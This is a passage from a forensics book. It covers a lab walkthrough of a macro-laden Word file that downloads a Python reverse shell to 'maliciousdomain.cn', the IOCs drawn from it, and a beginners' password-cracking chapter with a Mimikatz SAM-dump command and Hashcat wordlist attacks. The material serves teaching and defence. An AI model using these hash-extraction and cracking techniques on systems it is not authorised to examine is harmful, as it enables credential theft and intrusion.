This effectively filters out the noise of unrelated processes, giving the analyst an easy-to-follow graph that displays all actions conducted by the malware, including those of child processes spawned by the original process. It can also ingest packet captures to correlate network activity with the Procmon events. ProcDOT can be downloaded here⁶².

The netstat⁶³ tool included in Windows is another useful utility. You can use it to list all listening ports and established connections. You can review the connections and listening ports with the command netstat -ano. This command includes the process ID (PID) of the process using each listed port to help you correlate a suspicious connection to a process.

⁶²https://www.procdot.com/downloadprocdotbinaries.htm
⁶³https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/netstat
The tasklist⁶⁴ command can be used to list running processes and their associated process IDs from the command line. This can help you enumerate suspicious processes without needing to use a Graphical User Interface (GUI). It is helpful when used in conjunction with netstat to look up the process ID found with a suspicious network connection. The below screenshot shows that PID 4, listening on port 445 (SMB) on all interfaces (0.0.0.0), is the System process. In this case, it is a legitimate process and listening port combination. The System process also always loads as PID 4, so a PID other than 4 would be unusual and a potential IOC.

⁶⁴https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/tasklist
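The netstat-to-tasklist correlation can also be scripted. Here is a minimal sketch, once more assuming the third-party psutil package, that prints each TCP connection alongside the owning process name (running it elevated gives the most complete results):

```python
import psutil

# Print TCP connections with their owning process, similar to combining
# `netstat -ano` with `tasklist`.
for conn in psutil.net_connections(kind="tcp"):
    if conn.pid is None:
        continue
    try:
        pname = psutil.Process(conn.pid).name()
    except psutil.NoSuchProcess:
        pname = "?"
    raddr = f"{conn.raddr.ip}:{conn.raddr.port}" if conn.raddr else "-"
    print(f"{conn.laddr.ip}:{conn.laddr.port} -> {raddr} "
          f"{conn.status} PID={conn.pid} ({pname})")
```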
Another way to do the same analysis is to use the TCPView⁶⁵ tool from the Sysinternals Suite. The TCPView tool provides the same information received from netstat -ano and tasklist /SVC in a convenient, easy-to-read GUI. This allows you to quickly identify suspicious listening ports or connections and correlate them to the corresponding process. The remote address listed in TCPView and netstat is another useful IOC to include in your analysis.

⁶⁵https://docs.microsoft.com/en-us/sysinternals/downloads/tcpview
Wireshark is a valuable tool for conducting more in-depth packet analysis. Wireshark enables a malware analyst to view all network traffic sent and received on the suspected machine. An analyst can filter the packets by IP, port, protocol, or many other options. Filtering by the DNS protocol enables an analyst to find DNS queries to malicious sites used for Command and Control (C2) of malware. The domains found in the DNS queries are useful IOCs for determining if the machine is compromised.

Wireshark provides capabilities to conduct more advanced analysis of malware communication. It allows an analyst to identify C2 traffic hidden in protocols such as DNS. It also enables an analyst to extract data such as second-stage binaries or infected text documents downloaded by the malware. Using a proxy in combination with Wireshark enables an analyst to export the certificate and keys used to encrypt Transport Layer Security (TLS) traffic to recover the plaintext data sent between malware and attacker-controlled servers.
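Saved captures can also be triaged outside of Wireshark. The sketch below, assuming the third-party scapy package and a placeholder capture file name, dumps every unique DNS query name from a pcap so that unusual domains stand out quickly:

```python
from scapy.all import rdpcap
from scapy.layers.dns import DNSQR

# Collect every unique DNS query name seen in the capture.
queries = set()
for pkt in rdpcap("capture.pcapng"):  # placeholder capture file
    if pkt.haslayer(DNSQR):
        queries.add(pkt[DNSQR].qname.decode(errors="replace"))

for q in sorted(queries):
    print(q)
```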
The malware analysis walkthrough in this chapter will focus on using Wireshark to perform basic analysis tasks. This includes reviewing DNS queries to identify suspicious domain lookups and plaintext commands/passwords sent during malware communication. More advanced usage of Wireshark is out of scope for basic malware analysis and is saved for future writings on intermediate and advanced malware analysis. Wireshark can be downloaded here⁶⁶. Microsoft's NetMon is an alternative to Wireshark, but it is only available for download from the archive⁶⁷ and is no longer being developed.

Regedit is another useful tool built in to Windows. Regedit gives the ability to view and edit the Windows registry. It can be used in basic malware analysis to search for persistence mechanisms, such as entries in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run. Applications listed in the Run keys will auto-start when a user logs in to the machine, a mechanism sometimes used by malware to establish persistence.

⁶⁶https://www.wireshark.org/
⁶⁷https://www.microsoft.com/en-us/download/4865
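These Run keys are also easy to audit from a script. A minimal sketch using Python's standard winreg module (Windows only) to list the current user's auto-start entries:

```python
import winreg

# List auto-start entries in the current user's Run key, a common
# persistence location checked during basic malware analysis.
RUN_KEY = r"Software\Microsoft\Windows\CurrentVersion\Run"

with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
    num_values = winreg.QueryInfoKey(key)[1]  # second field: value count
    for i in range(num_values):
        name, value, _type = winreg.EnumValue(key, i)
        print(f"{name} = {value}")
```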
Regshot is useful for determining what changes an application makes to the Windows registry when it is executed. Regshot allows an analyst to take a snapshot of the Windows registry before and after executing a suspicious application and generates a comparison of the two snapshots. This is useful when analyzing a suspicious application in a controlled lab setting. Regshot can be downloaded here⁶⁸. However, Regshot is no longer being actively maintained. NirSoft provides an alternative to Regshot that is capable of handling registry comparisons. NirSoft's RegistryChangesView can be found here⁶⁹. The malware analysis portion of this chapter will still use Regshot.

⁶⁸https://github.com/Seabreg/Regshot
⁶⁹https://www.nirsoft.net/utils/registry_changes_view.html
Certutil is another tool built in to Windows that is useful for malware analysis. An analyst can use certutil to generate a hash of a file to compare against a known malicious file hash. This can indicate whether a file is malicious without having to execute it to investigate what it does. An analyst can use the hashes generated by certutil as IOCs once a suspicious file is determined to be malicious through analysis.
Certutil⁷⁰ is used in the above screenshot to generate the SHA1, MD5, and SHA256 hashes of cmd.exe. A malware analyst can compare these hashes to the hashes of the known legitimate versions of cmd.exe installed with Windows. The analyst can also submit these hashes to VirusTotal to see if it is a known malicious file.

An analyst can also use automated tools for analysis. Multiple tools mentioned already have features to upload files or hashes to VirusTotal. A suspicious file can be uploaded to VirusTotal⁷¹. VirusTotal is an online system that will execute the file in a sandbox to attempt to determine if it is malicious or not. It will then provide file hashes and IOCs an analyst can use to identify the file. VirusTotal also shares uploaded files with Antivirus vendors to use for building detection signatures.

⁷⁰https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
⁷¹https://www.virustotal.com/gui/home/upload
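The same hashes certutil produces can be computed with Python's standard hashlib module, which is convenient when hashing many files at once. A minimal sketch (the file path is a placeholder):

```python
import hashlib

def hash_file(path):
    """Compute MD5, SHA1, and SHA256 of a file, like repeated certutil runs."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as f:
        # Read in 1 MiB chunks so large files do not exhaust memory.
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for h in (md5, sha1, sha256):
                h.update(chunk)
    return md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()

print(hash_file(r"C:\Windows\System32\cmd.exe"))  # placeholder path
```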
Antiscan.me⁷² is another option an analyst can use to analyze a suspected file. Antiscan.me only checks uploaded files against 26 different Antivirus vendors. It also does not share the files with the Antivirus vendors. This makes it a good option if you are analyzing a file that you do not want to be shared with other organizations.

⁷²https://antiscan.me/
Basic Malware Analysis Walkthrough

Now that you are familiar with some of the tools used for malware analysis and their capabilities, it is time to do a walkthrough of a sample malware analysis. The walkthrough will teach how to use some of the tools mentioned in this chapter. It will not use any tools not previously mentioned. In this scenario, a user has reported that their machine has been running slow and acting "weird". You have already conducted an initial investigation by asking the user questions, including:
"When did the issues start?", "Did you download or install any new applications?" and "Did you click any links or open any documents from untrusted sources?" The user states that they did not install any applications recently but did review a Microsoft Word document sent from a customer.

We start our analysis by opening TCPView from the Sysinternals Suite to determine if we can quickly find any unusual processes communicating with remote sites. In this simple scenario, we find that there is currently only one process, python.exe, communicating with a remote system. We flag this as suspicious since Python is not typically used in this manner on our fictitious network. We then make a note of the port and IP as potential IOCs.

We can verify this using the other tools covered earlier as well. Netstat -ano lists an established connection between our test machine and the simulated attacker machine, with local IP/port 192.168.163.131:63590 and remote IP/port 192.168.163.128:8443, from the process with PID 6440. Tasklist /SVC lists that python.exe is running as PID 6440.
Process Explorer can also be used to verify the findings. Right-clicking on python.exe, selecting Properties, and then selecting the TCP/IP tab lists the connection to 192.168.163.128:8443. System Informer provides another easy means to find the unusual connection and correlate it to the python.exe process by selecting the Network tab.
We have verified that there is unusual network traffic on the potentially compromised machine and need to dig deeper into the traffic. We then open Wireshark to review a packet capture of the incident. We use the IP and port combination (ip.addr == 192.168.163.128 and tcp.port == 8443) to filter the traffic down to the currently interesting packets. The traffic is not encrypted, which allows us to extract plaintext communications.
We then right-click on one of the packets and select Follow TCP Stream to pull up the conversation in a readable format. This confirms that this is a malicious process used to create a reverse shell to the attacker. We are able to identify commands sent by the attacker and the responses from the infected machine.
The attacker ran a series of commands to enumerate identifying information about the machine and the privileges of the user account. The attacker then attempted to establish persistence by creating a service named NotBackDoor to auto-start the malware containing the reverse shell. This action failed, leading the attacker to attempt persistence by creating a run key in the registry for the current user, which succeeded.
At this point, we have verified that there is malware present on the system and that it is actively being used by a remote attacker. We immediately take action to isolate the machine to cut off access from the attacker and protect the rest of the network. In this scenario, we simply block the IP and port on the perimeter firewall and remove the infected machine from the network before continuing our analysis.

We then take steps to confirm the persistence measures taken by the attacker. We review the services in services.msc to verify that the NotBackDoor service was not successfully created. Then we take a look to ensure no other unusual services exist. The NotBackDoor service name and the binPath option of C:\Python27\python.exe C:\Windows\Tasks\bdw.py are still noted as IOCs, since the attacker did attempt to create the service and it could be present on other infected machines where the attempt succeeded.
Regedit is then used to verify the run key created, after verifying that no malicious services exist. We do find a NotBackDoor key that points to C:\Python27\python.exe C:\Windows\Tasks\bdw.py. We make note of this as an IOC. We also note that C:\Windows\Tasks is commonly used as a location to drop malware because low-privilege users are able to write to it and because it is commonly excluded from protections such as application whitelisting since it is located under C:\Windows.
The next step in this scenario is to navigate to the C:\Windows\Tasks folder to investigate the bdw.py file mentioned in the previous steps. The investigation finds that this is just a simple Python script to establish a reverse shell from the infected computer to the attacker's machine. We are able to determine that it contains the port number 8443, but it is pointing to a domain name of maliciousdomain.cn instead of an IP address.
We add this domain to the list of IOCs. We could have also identified the traffic associated with this domain if we had started this investigation by looking for suspicious DNS calls. The .cn top-level domain indicates this is a Chinese domain, and if we are in a scenario where traffic to China is abnormal, then this is a potential red flag.
We know that bdw.py is malicious and provided a remote attacker access to the infected machine, but we do not yet know how it got there. We see that the document the user stated they received from a new customer ends with the extension .docm. This informs us that the document contains macros, which could be the initial infection vector (IIV). Analysis of this file needs to be done in an isolated lab to prevent any reinfection. The document in this scenario contains only one line of text stating that it is a generic document for a malware analysis walkthrough. In a real-world scenario, we could search for unique strings in the document to use as IOCs to help others determine if they have received the same document.

The next step is to check the document for macros. Click View in the ribbon menu at the top of the document. Then select the Macros button and click the Edit button in the window that pops up. We find that this document does contain a simple macro that uses PowerShell to download bdw.py from maliciousdomain.cn. The macro then executes bdw.py to initiate the initial reverse shell connection. The macro contains the AutoOpen and Document_Open subroutines to run the downloader when the document is opened. We have now verified that Doc1.docm is a downloader used to infect the system with a Python-based reverse shell. We add Doc1.docm to our list of IOCs.
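Opening the document in Word works in an isolated lab, but the macro source can also be extracted without Office installed at all. A minimal sketch using the third-party oletools package (an assumption; it is not part of this scenario's toolset):

```python
from oletools.olevba import VBA_Parser

# Extract VBA macro source from the suspicious document without opening Word.
vba = VBA_Parser("Doc1.docm")
if vba.detect_vba_macros():
    for _fname, _stream, macro_name, code in vba.extract_macros():
        print(f"--- {macro_name} ---")
        print(code)
vba.close()
```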
We could have started our analysis with the Doc1.docm document that was mentioned by the user. This would have given us the information to track down the reverse shell that we found by analyzing the network traffic and processes earlier. Running Wireshark while executing the macro helps us find the DNS calls to maliciousdomain.cn. We can also extract the bdw.py script from the HTTP stream since it was downloaded unencrypted via HTTP. This can be useful in instances where more advanced malware downloads another stager and then deletes the stager from the system after running its payload.
We can also use the built-in certutil.exe tool to generate hashes of the malware files to use as IOCs. Run certutil -hashfile Doc1.docm SHA256 to generate a SHA256 hash of the document. You can also generate an MD5 hash and generate the hashes for bdw.py. These are useful IOCs for signature-based systems to detect the presence of the malware.
We can use Procmon and ProcDOT to verify that the malicious files did not spawn any additional processes that need to be investigated. The ProcDOT graph shows us that the python.exe process communicated over TCP to IP 192.168.163.128 and spawned a cmd.exe process. We can see the commands that were run in the cmd.exe process in the graph and verify that no additional files or processes were created. We can check whether any other registry settings are changed by executing the Word document macro on our test machine. We use Regshot to take a snapshot before and after opening the document and then compare the snapshots to review the changes. Start Regshot, click 1st shot, and then click Shot.
We then open the malicious Word document. We execute the macro, allowing it to download the bdw.py reverse shell from our attacker web server and add our persistence registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Then we click 2nd shot in Regshot and select Shot. This takes the second snapshot and allows us to click the Compare button to compare the snapshots. This produces a .txt document listing all of the registry changes that occurred between the snapshots. It contains a lot of noise and can be tedious to sort through.
We can verify that the persistence mechanism was added. We can also find evidence that the user clicked the Enable Content button allowing the macro to run. This is found by searching for TrustRecords, which reveals an entry for the malicious document under the TrustRecords key. We can supplement our work with automated analysis by uploading the document to VirusTotal to determine if it is detected as malicious by any of the antivirus vendors. VirusTotal lists 30 out of 62 vendors detecting the document as malicious, with most of the detections flagging it as a downloader. This matches what we determined from our own analysis.
Analysis Wrap-Up

We have now completed analyzing the system to verify that it is infected with malware. We determined what the malware does, and we have extracted IOCs to implement in our defensive tools to detect future infection attempts. The machine will need to be reimaged before returning it to the user to ensure all malware has been eradicated. It is important to ensure a forensic image is taken before reimaging the system if evidence preservation is needed for legal cases or future investigations. To recap our IOCs:

• Downloader macro in a document titled Doc1.docm
• Unique string “This is a generic document for a malware analysis walkthrough” in Doc1.docm
• Second-stage Python reverse shell named bdw.py stored in C:\Windows\Tasks
• Service named NotBackDoor to auto-start bdw.py
• HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NotBackDoor registry key to autorun bdw.py
• SHA256 hash of Doc1.docm - 6fa2281fb38be1ccf006ade3bf210772821159193e38c940af4cf54fa5aaae78
• MD5 hash of Doc1.docm - b85e666497ea8e8a44b87bda924c254e
• SHA256 hash of bdw.py - f24721812d8ad3b72bd24792875a527740e0261c67c03fe3481be642f8a4f980
• MD5 hash of bdw.py - 34ca38da117d1bb4384141e44f5502de
• bdw.py downloaded from maliciousdomain.cn
• bdw.py reverse shell to IP 192.168.163.128 (maliciousdomain.cn)
• bdw.py reverse shell on port 8443
Conclusion

This was a simple example of how to conduct basic malware analysis. The tools and techniques discussed in this scenario can be used in a real-world scenario to determine if a machine is infected with malware and to extract some IOCs. The malicious files used for this scenario and a copy of the walkthrough can be found on my GitHub⁷³. You will need a system with netcat to receive the reverse shell, as well as fakedns⁷⁴ to simulate a DNS server that directs the maliciousdomain.cn calls to your attacker machine. More advanced malware will require additional tools and techniques. The techniques used to reverse engineer malware, including decompiling, disassembling, and debugging, are covered in courses such as SANS FOR610 Reverse Engineering Malware⁷⁵. The FOR610 course is a good step up to the next level if you enjoyed this basic malware analysis. The course also teaches some techniques for deobfuscating code, whereas this basic analysis consisted only of unobfuscated code. Additional advanced topics to look into include techniques to recover encryption keys. Those techniques are useful for decrypting the source code of encrypted malware or for recovering keys to decrypt files that have been encrypted by ransomware. Familiarity with assembly language programming is needed for debugging and reverse engineering of malware. Basic knowledge of JavaScript is also useful for analyzing web-based malware. You can also increase your skills by taking a malware development course from Sektor7⁷⁶. Learning to develop malware will help you better understand how to detect malware and will teach you additional techniques used by modern malware. SANS also offers the advanced FOR710 course, Reverse-Engineering Malware: Advanced Code Analysis⁷⁷. If you enjoyed this walkthrough and would like to see more, you can check out my GitHub⁷⁸ for a walkthrough on performing white box code analysis of a vulnerable web application and coding a full chain exploit. I have solutions for various vulnerable web applications and binary exploitation challenges and will be adding a couple of binary exploitation and reverse engineering walkthroughs in the future. I can also add intermediate malware analysis walkthroughs if there is enough interest.

⁷³https://github.com/ApexPredator-InfoSec/Basic-Malware-Analysis
⁷⁴https://github.com/SocialExploits/fakedns/blob/main/fakedns.py
⁷⁵https://www.sans.org/cyber-security-courses/reverse-engineering-malware-malware-analysis-tools-techniques/
⁷⁶https://institute.sektor7.net/red-team-operator-malware-development-essentials
⁷⁷https://www.sans.org/cyber-security-courses/reverse-engineering-malware-advanced-code-analysis/
⁷⁸https://github.com/ApexPredator-InfoSec
Chapter 3 - Password Cracking for Beginners

By John Haynes⁷⁹ | GitHub⁸⁰ | Discord⁸¹

Disclaimer & Overview

This chapter is a beginner's guide on how to crack passwords. While on the surface this may seem to be something reserved for cybercriminals, there are legitimate reasons for a law-abiding individual to understand this process. Firstly, those who work in penetration testing or a red team environment will need to know how to do this task. Secondly, law enforcement may need to access data that is password protected with the legal authority of a search warrant. Third, important data may need to be recovered from a device after the owner is deceased for the estate or heirs. There may also be other ways to legally access password-protected data, such as forgotten passwords or security concerns in a corporate environment. Finally, it is important for someone who wishes to keep their data secure to understand this process, to know why a strong password is important, and to know how to test the security of their passwords without compromising those passwords. That being said, I do not condone, encourage, or support those who would use this information for malicious or illegal means. This chapter will start with the fundamentals of hashing and end with showing how a strong password makes a substantial difference when attempting to crack complex passwords. I will also touch on more advanced concepts for custom wordlist generation and optimization.

⁷⁹https://www.youtube.com/channel/UCJVXolxwB4x3EsBAzSACCTg
⁸⁰https://github.com/FullTang
⁸¹http://discordapp.com/users/167135713006059520
In digital forensics, the first challenge is to get the data into a state where it can be analyzed. For those who need to legally access data, there should be something in here for you. For those who wish to learn how to better secure their data, there should be something in here for you as well. Let's get started!

Password Hashes

At the fundamental level, a password is like a key that fits into and unlocks a particular lock. Only you have the key, but anyone can come up and inspect the lock. With a mechanical lock, nobody can see the internal functions of the lock without specialized tools like lock picks. If someone were proficient with lock picks, they could theoretically determine the depth of each pin while picking the lock to make a key that would unlock it. The same sort of concept is true for passwords. Each password should have a unique algorithmic hash. To obtain a hash, a complex mathematical algorithm is run against a string of data, and the output is a practically unique character string. For some weaker hash algorithms, there have been hash collisions where two different sets of data have resulted in the same output hash. However, when considering human-generated passwords, it is normally not necessary to worry about hash collisions. It is sufficient to say that if you have the hash of a password, you have the password in an encrypted state. The password hash is how the password is stored on any modern operating system like Windows, macOS, or Linux, and for encrypted containers like BitLocker or encrypted 7-Zip files. With the right tools, that is the only part of the password that will be available for an examiner to inspect, just like the mechanical part of a lock is the only thing to inspect on a locked door if someone were to try to pick the lock. There are methods to prevent the extraction of a password hash, but it is reasonable to attempt to find a method to extract a hash from a system if the individual has physical access to the electronic device, encrypted file, or a forensic image (.E01, dd, or similar) of an encrypted volume or file. Therefore, if the password hash can be extracted, it can be attacked to attempt to crack the password. Hashing algorithms are mathematically a one-way operation. If someone has a password hash, there is no normal mathematical operation that can be performed to reverse engineer the original plaintext password. Additionally, some hashing algorithms are more difficult to crack than others because speed is deliberately sacrificed for security. However, the user can guess a potential password, hash it, and then compare the resulting hash against the known hash. If it is a match, then the password is cracked. This would be a very slow method to do manually, but there is software like Hashcat that can automate this process and perform thousands to billions of attempts per second, depending on the hash type. To make the guessing more difficult, the system can implement what is known as a “salt” to obfuscate the hash and make it more difficult to crack. A discussion of password hashes would not be complete without mentioning salted passwords. The salt for a password is additional data that is added to the password before the hash algorithm is applied, complicating the guessing of the password. Therefore, the salt would have to be known and applied to each potential guess; otherwise, the hash would be incorrect even if the correct password was guessed.
The salt can be generated in several different ways and can be static or dynamic
depending on developer choice. Unfortunately, Windows does not salt the NTLM password hashes that it generates, so they are vulnerable to attack. As was just mentioned, Windows stores password hashes in NTLM format. This is unfortunately a very weak form of protection, as it is essentially an MD4 hash of the password. The VTech company was compromised in 2015 by a SQL injection attack, and when the password hashes were analyzed they were determined to be MD5. MD5 is considered to be a weak form of protection, and some do not consider it encryption at all because it is so weak. Windows uses an even weaker algorithm for its passwords, and those passwords are not even salted to compensate! Windows has upgraded to NTLMv1 and NTLMv2 for some uses, but those are still weak by most standards. Even more concerning, these NTLM hashes of user passwords are transmitted over the network for authentication between computers (Patton, 2022). This is one of the passwords users will use most often, and it can be extracted by several methods, including packet sniffing. It is also nearly guaranteed not to be generated by a password manager, as the user has to physically type the password on the keyboard.

Useful Software Tools

There is no reason to reinvent the wheel, as in most situations someone else has already created a tool that will perform the task needed. The same is true for using software to assist in cracking passwords. The general workflow for cracking a password is hash extraction, hash identification, attacking the hash with general methods, and attacking the hash with custom methods. Tools that can assist in these phases are Mimikatz⁸², Hashcat⁸³, John the Ripper⁸⁴, Passware⁸⁵, Gov Crack⁸⁶, custom scripts often shared on GitHub, and many more. Some tools like Passware are paid tools, and while there is nothing wrong with a paid tool, this chapter will focus on using the free tool Hashcat. Gov Crack has a graphical user interface (GUI) while Hashcat and John the Ripper use command-line interfaces (CLI). GUIs normally allow for ease of access but tend to lack the flexibility of CLI tools. Nearly all of the custom scripts used for hash extraction and posted on GitHub are going to be CLI-based tools. If the reader is unfamiliar with the command line, that should not be a limiting factor for at least understanding the methods discussed in this chapter, and there will be step-by-step instructions on how to crack a password hash in Hashcat. The focus on a particular set of tools over another is due to personal experience with certain tools; no bias towards any particular tool is intended, as many tools can do the same thing and overlap with each other in certain functions.

⁸²https://github.com/gentilkiwi/mimikatz
⁸³https://hashcat.net/hashcat/
⁸⁴https://github.com/openwall/john
⁸⁵https://www.passware.com/
⁸⁶https://www.govcrack.com/
Hash Extraction Techniques

One common method to extract an NTLM hash is to use Mimikatz, but it is widely recognized as malware by most anti-virus software. If the individual has access to a forensic image (an .E01 or similar) of the hard drive of the computer, then Mimikatz can be used against the SAM and SYSTEM registry files found in C:\Windows\System32\config, assuming BitLocker or another form of encryption is not present (see the example command at the end of this section). Even with live access to a machine, administrator rights and a forensic tool such as FTK Imager⁸⁷, preferably preloaded on a USB drive, will be required to copy the registry files, as a simple copy/paste or drag-and-drop will not work. This is just one way to obtain an NTLM hash, as it can also be obtained by observing network traffic. In general, this is a great place to start when trying to crack passwords and try out different methods, as the NTLM hash uses a weak algorithm. If the examiner is looking at an APFS encrypted volume from a MacBook, it is important to realize that the password for the encrypted volume is the same as the password used to log into the system. However, this hash uses a strong algorithm and will take much longer to crack compared to an NTLM hash. To extract the hash, there are tools available like the one from user Banaanhangwagen⁸⁸ on GitHub. This will require using Linux to run the tool and extract the hash from a raw or .dd forensic image. Other encryption methods include BitLocker, zipped or compressed files, password-protected Word documents, and many more. Generally speaking, some smart person somewhere has figured out how to extract the hash and has shared that information for that particular situation. The examiner needs to search for hash extraction for a particular make, model, file system, software version, or a combination of those and similar attributes. John the Ripper⁸⁹ is a great place to start when looking for how to extract a hash. Also, as a general rule, the hash is likely to be stored in plain text somewhere in the hex (the raw data) on an electronic device. If the examiner is willing to poke around and search the hex, they may be able to find the password hash, assuming the correct decoding method is used. This is not a hard-and-fast rule by any means, as there are complex methods of preventing external access to protected memory areas. For example, at the time of writing this, I know of no known method to extract a hash from a Chromebook, even though it is possible to log into a Chromebook without it being connected to the internet, implying that a hash of the user's password must be stored locally on the device.

⁸⁷https://www.exterro.com/ftk-imager
⁸⁸https://github.com/Banaanhangwagen/apfs2hashcat
⁸⁹https://github.com/openwall/john
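To make the extraction step concrete: with copies of the SAM and SYSTEM hives exported from the image, the Mimikatz invocation looks roughly like the following sketch (the hive paths are assumptions for illustration):

mimikatz # lsadump::sam /system:C:\Cases\SYSTEM /sam:C:\Cases\SAM

This prints each local account along with its NTLM hash, which can then be fed to Hashcat.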
Hash Identification

There may be times when a password hash has been located but the hash type is unknown. Hashcat has an entire wiki, including example hashes, that can aid in this process. The example hashes are located on the Hashcat Wiki⁹⁰ and can help with the identification of an unknown hash. A simple Google search for “hash identification” turns up multiple online tools that can help identify the type of hash, be it NTLM, SHA-256, or many others. Several such websites include Skerritt⁹¹, Hashes.com⁹², and Onlinehashcrack.com⁹³. Be wary of using these or any other websites for sensitive hashes, as the website now has the actual hash. For advanced examiners who do not want to use an online tool, Kali Linux also has an offline tool called Hash-Identifier⁹⁴ that can be downloaded and used locally so the hash is not shared.

Attacking the Hash

Once the type of hash is identified, it is time to attempt to crack it. The simplest yet least secure method of cracking a password from a hash is once again to use an online resource. Some of the previously mentioned websites also offer services that will attempt to crack a hash, but those are limited. The use of a password cracking tool such as Hashcat is highly recommended, as it allows for a much more powerful, robust, and secure method of cracking a password hash. Here is a hash taken from the Hashcat Wiki: b4b9b02e6f09a9bd760f388b67351e2b. This is an NTLM hash of a word in the English language. If you have visited the website then it is easy to determine what this hash is, but let's assume that we know nothing about this hash other than that it was extracted from a Windows machine, and we want to crack it using Hashcat. Recall that cracking this password means coming up with a potential password, hashing it, and comparing the two hashes until we find a match. This is a process Hashcat will automate for us. If we get it wrong, the worst that will happen is we move on to the next potential password and try again. There are two primary methods of attacking a password: a brute-force method and a more focused attack. An exhaustive brute-force attack would iterate through the combinations of all possible symbols on the keyboard. This is not ideal, but let's explore the mathematical reason why it is not the best method before explaining a better one. If an exhaustive attack were performed against a password, every possible permutation of all possible characters, numbers, and symbols on the keyboard would be attempted. For the standard English QWERTY keyboard, there are 10 digits 0123456789, 26 lowercase letters abcdefghijklmnopqrstuvwxyz, 26 uppercase letters ABCDEFGHIJKLMNOPQRSTUVWXYZ, and 33 special characters or symbols, !@#$%^&*()-_=+[{]}|;:'",<.>/? . Note that space (the spacebar) is also included in the special character count. Adding these together results in 10 + 26 + 26 + 33 = 95 total possible characters.

⁹⁰https://hashcat.net/wiki/doku.php?id=example_hashes
⁹¹https://nth.skerritt.blog/
⁹²https://hashes.com/en/tools/hash_identifier
⁹³https://www.onlinehashcrack.com/hash-identification.php
⁹⁴https://www.kali.org/tools/hash-identifier/
These ninety-five characters can be used at any point in a password, assuming they are all allowed. So for a single-character password, there are only 95 possible combinations. For a two-character password, there are 95 x 95 = 9,025 possible combinations. A three-character password has 95 x 95 x 95 (or 95³) = 857,375 combinations, a four-character password has 95⁴ = 81,450,625 combinations, and a very short five-character password has an astonishing 95⁵ = 7,737,809,375 combinations, over seven billion! Even a meager eight-character password has over six quadrillion (a quadrillion is the name of the number just beyond trillion) possible combinations! Not only does this show the difficulty of trying every possible character, it also shows the strength of using unusual symbols in passwords. Even with modern computing capable of testing millions of possible passwords per second, it could take decades or longer to crack an eight-character password using this method on normal computers. We need a better method! To speed up this process, we need to make some assumptions about the original password rather than guessing random characters. This brings up the primary weakness of passwords, and therefore the best method of attacking them once the examiner has the hash. Since most passwords must be remembered by the user, a password is very likely to contain a word in a language that the user knows. The total number of guesses can be greatly reduced by avoiding letter combinations that are not words. The total number of words in the 2022 Oxford English Dictionary is over 600,000, but this does include outdated, obsolete, and obscure words. Still, this is a huge improvement over even a short three-character permutation! It is also common to add numbers or symbols to the end of a password, so we can also append numbers to a valid word and try those combinations. Sophisticated users may decide to use “leet speak”⁹⁵ and replace letters like ‘S’ with the number ‘5’, the letter ‘A’ with the number ‘4’, the letter ‘E’ with the number ‘3’, and the letters ‘I’ or ‘l’ with the number ‘1’, because they look similar to the corresponding letter. For example, the word “Apples” may become “4pp135” when using leet speak. Finally, the addition of symbols is common at the end of the password, so common symbols like “!” can be appended (Picolet, 2019). This is by no means an exhaustive list, but it is a good starting point considering the alternative of a true brute-force attack.

⁹⁵https://en.wikipedia.org/wiki/Leet
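The keyspace arithmetic above is easy to reproduce. A few lines of Python make the exponential growth obvious:

# Size of an exhaustive keyspace over a 95-character set.
CHARSET = 95
for length in range(1, 9):
    print(f"{length} characters: {CHARSET ** length:,} combinations")

The final line prints 6,634,204,312,890,625, which is the "over six quadrillion" figure cited above for eight characters.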
Wordlists

Now that we know a better method, we need a way to use it to attack passwords. The simplest approach is to use a list of words, or wordlist, of possible passwords. Just like it sounds, it is a list of possible passwords that already have symbols and numbers added to them. When a wordlist is used to attack a password, it is often called a dictionary attack. It is possible to manually build our own wordlist, but that is a very time-intensive task, as we would not only need to create useful passwords but also avoid duplicates. Fortunately, there are prebuilt wordlists we can use. When companies are hacked, passwords are often part of the stolen data. Companies should encrypt their data, specifically user passwords, but this is not always the case. In 2009, the social gaming company RockYou was compromised by a SQL injection attack. The hacker was able to gain access to over 32 million accounts, and the company was storing passwords in the clear, meaning there was no encryption whatsoever and the passwords were stored in plain text (Cubrilovic, 2009). This list of passwords has become known as the rockyou list and is commonly used as a starting point for dictionary attacks. Passwords compromised and cracked in later breaches have also been added to wordlists. It is important to note that a good password list will have been deduplicated so it contains no repeated entries. This is a key way to save time when cracking passwords, by not attempting the same password multiple times. A good online resource where wordlists are compiled and ranked is Weakpass.com⁹⁶ (W34kp455, 2014). On this site, wordlists are ranked by popularity and functionality from 0 to 100, using a color-coding system that corresponds with the numerical ranking. Note how there are varying sizes of lists, ranging from over 400GB to only a few bytes. The first several wordlists offered for download may not be ranked very high, being color-coded red and only in the single digits. Selecting “Lists” and then “Medium” should display the original rockyou wordlist as rockyou.txt on the first page, with just over 14 million unique passwords. When selecting “Lists” from the horizontal menu and then “All” we can sort all lists by popularity. Near the top of the list should be the cyclone.hashesorg.hashkiller.combined.txt password list with about 1.5 billion total passwords. This is one of the top-ranked lists while only being just over 15GB in size. I recommend this list and use it frequently because it offers a good balance of reduced size and enough coverage to crack most common passwords. The total time to iterate through the list is not unreasonable for many password hash types, and it stands a decent chance of cracking many passwords with a straight dictionary attack. The “All-in-One” tab allows for downloading a deduplicated version of all passwords on the site in various lengths for different applications, but know that a longer list will take longer to complete than a shorter one. If you haven't noticed, there is also an estimated time to iterate through each list for a particular password type shown under each list. While this can vary widely between different computers, it does a good job of showing the relative time difference it takes to run that list against the different hash types.
If the 15GB password list is too large for you, here⁹⁷ is a smaller list that is not posted on Weakpass.

⁹⁶https://weakpass.com/
⁹⁷https://github.com/FullTang/AndroidPWList
This list combines several of the smaller wordlists from Weakpass and uses a few other techniques, for an uncompressed size of just under 1GB. If you plan on installing and using Hashcat, I would strongly recommend downloading at least one list of your choice.
Installing Hashcat

